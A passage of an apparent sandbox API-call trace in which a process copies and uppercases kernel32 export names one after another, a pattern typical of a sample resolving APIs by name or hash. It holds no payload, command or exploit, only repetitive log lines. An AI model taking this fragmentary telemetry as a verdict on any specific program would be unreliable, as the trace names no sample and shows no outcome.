lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.297] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.297] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.297] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.297] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.297] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.297] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.297] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.297] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.297] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.297] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.297] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.298] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.298] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.298] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.298] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.298] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.298] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.298] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.298] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.298] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.298] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.298] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.298] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.298] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.298] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.298] lstrlenA (lpString="COPYFILEA") returned 9 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.298] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.298] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.298] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.298] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.298] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.299] lstrlenA (lpString="COPYFILEW") returned 9 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.299] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.299] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.299] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.299] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.299] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.299] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.299] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.299] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.299] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.299] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.299] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.299] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.299] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.299] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.299] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.299] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.299] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.299] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.299] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.300] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.300] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.300] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.300] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.300] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.300] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.300] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.300] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.300] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.300] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.300] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.300] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.300] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.300] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.300] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.300] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.300] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.300] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.300] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.301] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.301] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.301] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.301] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.301] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.301] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.301] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.301] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.301] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.301] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.301] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.301] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.301] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.301] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.301] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.301] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.301] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.301] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.302] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.302] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.302] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.302] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.302] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.302] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.302] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0080.302] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0080.302] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0080.302] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0080.302] lstrlenA (lpString="CREATETHREAD") returned 12 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0080.302] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0080.302] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0080.302] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0080.302] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0080.302] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0080.302] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0080.302] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0080.302] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0080.302] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0080.303] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0080.303] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0080.303] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0080.303] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0080.303] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0080.303] lstrlenA (lpString="CTRLROUTINE") returned 11 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0080.303] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0080.303] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0080.303] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0080.303] lstrlenA (lpString="DEBUGBREAK") returned 10 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0080.303] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0080.303] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0080.303] lstrlenA (lpString="DECODEPOINTER") returned 13 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0080.303] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0080.303] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0080.303] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0080.303] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0080.303] lstrlenA (lpString="DELETEATOM") returned 10 [0080.303] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0080.303] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.304] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.304] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.304] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.304] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.304] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.304] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.304] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.304] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" 